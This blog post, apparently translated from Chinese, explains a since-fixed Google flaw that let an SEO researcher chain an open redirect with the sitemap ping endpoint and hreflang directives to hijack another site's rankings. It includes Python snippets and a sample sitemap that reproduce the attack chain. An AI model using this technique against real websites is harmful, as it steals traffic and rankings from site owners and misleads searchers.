- Avoid the black hat pitfalls that a regular website must never fall into
- Gain a multi-channel, deeper understanding of how search engines work
- Understand where the limits of search ranking algorithms lie
- Develop white hat skills from clever black hat SEO techniques
I have done some research on the websites and rankings used in domestic black hat SEO, such as gambling and pornography sites, and have had some contact with the companies involved. I admire the industry's profitability, team sizes, and spirit of exploration and application. On the whole, though, domestic black hat SEO practice leans toward the traditional: mostly the extreme, large-scale exploitation of certain known vulnerabilities or parameters of search algorithms. Some foreign black hats explore SEO in far more unexpected and imaginative ways.
A few days ago I saw an example that could have been used for black hat SEO: exploiting a vulnerability in Google's XML sitemap ping submission to hijack the rankings of other people's websites. My reaction after reading it was: you can do that? Some people really are inventive, apparently have time on their hands, and keep probing every possibility. Fortunately, this vulnerability was never actually used for black hat SEO; it was reported through Google's vulnerability reward program, and its discoverer, Tom Anthony, received a $1,337 prize.
Tom Anthony is not a typical IT security researcher but an SEO practitioner: he heads product development at Distilled, a well-known British SEO agency. He describes the exploit in detail in his blog post.
Simply put, Tom Anthony used the ping mechanism to submit to Google an XML sitemap hosted on his own website (a sitemap containing indexing directives, in this case hreflang tags). Because of vulnerabilities in Google and in other websites, Google mistook this sitemap for another site's sitemap, which let Tom Anthony's website get indexed quickly and hijack that site's rankings.
Google accepts sitemap.xml submissions in several ways:

- Specify the location of sitemap.xml in the robots.txt file
- Submit it in the Google Search Console dashboard
- Ping the location of sitemap.xml to Google
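For reference, the first method is just a single line in robots.txt (example.com is a placeholder):

```
Sitemap: http://www.example.com/sitemap.xml
```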
The third method, pinging, means sending a GET request to Google's ping endpoint:

http://www.google.com/ping?sitemap=http://www.example.com/sitemap.xml

Here, http://www.example.com/sitemap.xml is the sitemap.xml file being submitted. Tom Anthony found that, old site or new, Google would come and crawl the sitemap.xml file within ten-odd seconds of receiving the request.
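A minimal Python sketch of that ping request, using the endpoint as it worked at the time (example.com stands in for a real site):

```python
from urllib.parse import quote

# The sitemap to submit; Google fetched it within ten-odd seconds.
sitemap_url = "http://www.example.com/sitemap.xml"

# Build the ping URL; the sitemap URL goes in as a query parameter.
ping_url = "http://www.google.com/ping?sitemap=" + quote(sitemap_url, safe="")
print(ping_url)
# -> http://www.google.com/ping?sitemap=http%3A%2F%2Fwww.example.com%2Fsitemap.xml

# Sending the GET request is the whole submission, e.g.:
# from urllib.request import urlopen
# urlopen(ping_url)
```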
The next step exploits the open redirect vulnerability some websites have: a redirect that is completely open and can point to any other site. Some websites control the redirect destination through a parameter in the URL, for example sending the user to a specified address after login (the parameter name here is illustrative):

http://www.abc.com/login?continue=http://www.abc.com/page.html

That is, after logging in to the abc website, the user is redirected to the page.html page and continues browsing normally. Normally, page.html should live on the abc.com domain. But some websites don't validate the destination and will happily redirect to other sites, for example:

http://www.abc.com/login?continue=http://www.xyz.com/page.html

After logging in, the user ends up on a different website, xyz.com. And it doesn't even have to be a real login: simply visiting the URL triggers the redirect, whether the script is login, logout, or any other script.php. This is an open redirect, and open redirects are quite common, even on big sites.
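The flaw can be sketched as a naive login handler that redirects to whatever the query string says, without checking the host (the `continue` parameter name is illustrative):

```python
from urllib.parse import urlparse, parse_qs

def redirect_target(request_url: str) -> str:
    """Return the Location a vulnerable handler would redirect to.

    The handler trusts the 'continue' parameter blindly; a safe
    version would first verify the target host is its own domain.
    """
    params = parse_qs(urlparse(request_url).query)
    return params.get("continue", ["/"])[0]

# Intended use: the target stays on abc.com
print(redirect_target("http://www.abc.com/login?continue=http://www.abc.com/page.html"))
# Open redirect: the target escapes to another domain entirely
print(redirect_target("http://www.abc.com/login?continue=http://www.xyz.com/page.html"))
```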
Tom Anthony registered a new domain, xyz.com, then chained the two vulnerabilities by pinging Google with a sitemap URL like this (redirect parameter name again illustrative):

http://www.google.com/ping?sitemap=http://www.abc.com/login?continue=http://www.xyz.com/sitemap.xml

xyz.com is his own newly registered domain, and abc.com is a website with an open redirect and healthy search traffic. Obviously, the sitemap.xml file sits on xyz.com, but Google treated it as the sitemap of abc.com (the domain before the redirect). In this way, a black hat SEO could control another site's sitemap file and use certain directives to hijack its weight, rankings, and traffic.
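Putting the two pieces together, the chained ping URL could be built like this (domains and the `continue` parameter are the hypothetical ones from the example above; note the attacker's URL gets encoded twice, once into the redirect and once into the ping):

```python
from urllib.parse import quote

# Attacker's sitemap, hosted on the newly registered xyz.com.
attacker_sitemap = "http://www.xyz.com/sitemap.xml"

# Wrap it in abc.com's open redirect.
open_redirect = ("http://www.abc.com/login?continue="
                 + quote(attacker_sitemap, safe=""))

# Ping Google with the redirecting URL; Google follows the redirect
# and fetches the attacker's file, yet attributes it to abc.com.
ping_url = "http://www.google.com/ping?sitemap=" + quote(open_redirect, safe="")
print(ping_url)
```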
Tom Anthony ran many tests, and what succeeded was the hreflang directive. He picked a British retailer's website (the abc.com in the example above); to protect them, he didn't say which one. He scraped that website, structure and content included, onto his own xyz.com domain, modifying only details such as addresses and currency. He then placed a sitemap.xml file on xyz.com listing the UK website's URLs, but added to each URL an hreflang directive, the tag multilingual sites use, telling Google that the US version of each UK page lives on xyz.com. Finally, as described above, he submitted the sitemap.xml on xyz.com via the ping mechanism, and Google mistook it for the legitimate sitemap.xml of the UK website abc.com.
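A sketch of what such a sitemap entry could look like, following the standard format for declaring hreflang alternates inside a sitemap (URLs are placeholders for the real sites):

```xml
<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"
        xmlns:xhtml="http://www.w3.org/1999/xhtml">
  <!-- A real URL on the victim site abc.com... -->
  <url>
    <loc>http://www.abc.com/some-product/</loc>
    <!-- ...claiming the attacker's scraped copy is its US-English version -->
    <xhtml:link rel="alternate" hreflang="en-us"
                href="http://www.xyz.com/some-product/"/>
  </url>
</urlset>
```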
As a result, Google passed the UK website's weight to the xyz.com domain. Tom Anthony isn't entirely explicit on this point, but my understanding is that xyz.com received on Google.com the weight and rankings the UK website had on Google.co.uk.
Within 48 hours, the new domain was indexed and began picking up some long-tail rankings. Within a few days, important commercial keywords ranked too, right alongside Amazon, Toys R Us, Wal-Mart, and the like. Tom Anthony pointedly noted that this was a domain just 6 days old, with no external links, and with scraped content.
Tom Anthony then found that the Google Search Console account for xyz.com listed the UK website among xyz.com's external links (there was no actual link, mind you). More seriously, he could submit a sitemap.xml file for that UK site directly within xyz.com's Google Search Console account, without even pinging. Google seemed to treat the two unrelated websites as one, or at least as related.
Tom Anthony also tested other directives, such as noindex (which could make a framed competitor vanish from the index) and rel=canonical, but those didn't work. He also considered further experiments, such as: does it matter whether xyz.com's structure and content match abc.com's, and to what extent?
Another interesting point is that the hijacked website may have no idea anything happened. Some negative SEO tactics used to frame competitors can be detected, for example creating lots of spam links to a rival, which shows up clearly in multiple tools. With the vulnerability Tom Anthony found, the hijacked website cannot tell what is going on, or even that it was hijacked at all. The British website in this case, for instance, doesn't operate in the United States, so it might never look at Google's US rankings.
Tom Anthony submitted the bug on September 23, 2017. After some back and forth, Google confirmed on March 25, 2018 that the bug had been fixed and agreed to let him publish his blog post.
The Search Engine Land article also has a long passage describing Tom Anthony's inner deliberation: why not use the vulnerability for his own gain, but report it to Google instead? Compared with the potential traffic and profit, a prize of just over $1,000 is nothing. A matter of principle. Those interested can read it in full.
Finally, Google's comment on the vulnerability was, roughly: "When this vulnerability was reported, we organized the relevant teams to resolve it. This was a newly discovered vulnerability, and we believe it had not been exploited."